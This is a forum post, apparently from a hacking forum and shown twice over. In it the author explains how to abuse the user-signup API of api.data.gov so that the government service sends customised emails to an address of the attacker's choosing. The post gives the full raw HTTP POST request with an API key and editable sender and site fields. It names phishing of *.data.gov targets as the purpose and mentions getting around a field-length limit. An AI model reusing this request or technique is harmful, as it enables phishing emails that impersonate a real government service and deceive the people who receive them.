Пожалуйста, обратите внимание, что пользователь заблокирован
In this thread I will discussion how I was able to customize emails from api.data.gov and send it to a user of my choice. Credit to pom for giving me the idea.
Below is the request that I stumbled across on open.gsa.gov/api/regulationsgov/
Код:
Скопировать в буфер обмена
POST /api-umbrella/v1/users.json?api_key=E41mzkIX0ZReJvQbcSFtqhckpqFnTtkcsjFWAx1Z HTTP/1.1
Host: api.data.gov
Content-Length: 521
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: rnd
Origin: https://open.gsa.gov
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://open.gsa.gov/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
user[first_name]=test&user[last_name]=test&user=test@yopmail.com&user[website]=doxbin.co.uk&user[use_description]=test&user[terms_and_conditions]=1&user[registration_source]=gsa-regulations&options[example_api_url]=&options[contact_url]=https://beta.regulations.gov/support&options[site_name]=Regulations.gov+API&options[send_welcome_email]=true&options[email_from_name]=eRulemaking+Help+Desk&options[email_from_address]=&options[verify_email]=true
By inspecting the page we can see all the default values
Turns out all the values are able to be changed in the request on the clients side so that is what I did.
Some issue that I came across was the limit on the first_name parameter, meaning the contents of the email was limited. I was able to bypass this limit restriction using another paramter.
This is a cool method of inboxing phishing emails for example if i was targeting someone on *.data.gov i could craft this fully legit email.
Последнее редактирование: 25.11.2021
In this thread I will discussion how I was able to customize emails from api.data.gov and send it to a user of my choice. Credit to pom for giving me the idea.
Below is the request that I stumbled across on open.gsa.gov/api/regulationsgov/
Код:
Скопировать в буфер обмена
POST /api-umbrella/v1/users.json?api_key=E41mzkIX0ZReJvQbcSFtqhckpqFnTtkcsjFWAx1Z HTTP/1.1
Host: api.data.gov
Content-Length: 521
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: rnd
Origin: https://open.gsa.gov
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://open.gsa.gov/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
user[first_name]=test&user[last_name]=test&user=test@yopmail.com&user[website]=doxbin.co.uk&user[use_description]=test&user[terms_and_conditions]=1&user[registration_source]=gsa-regulations&options[example_api_url]=&options[contact_url]=https://beta.regulations.gov/support&options[site_name]=Regulations.gov+API&options[send_welcome_email]=true&options[email_from_name]=eRulemaking+Help+Desk&options[email_from_address]=&options[verify_email]=true
By inspecting the page we can see all the default values
Turns out all the values are able to be changed in the request on the clients side so that is what I did.
Some issue that I came across was the limit on the first_name parameter, meaning the contents of the email was limited. I was able to bypass this limit restriction using another paramter.
This is a cool method of inboxing phishing emails for example if i was targeting someone on *.data.gov i could craft this fully legit email.
Последнее редактирование: 25.11.2021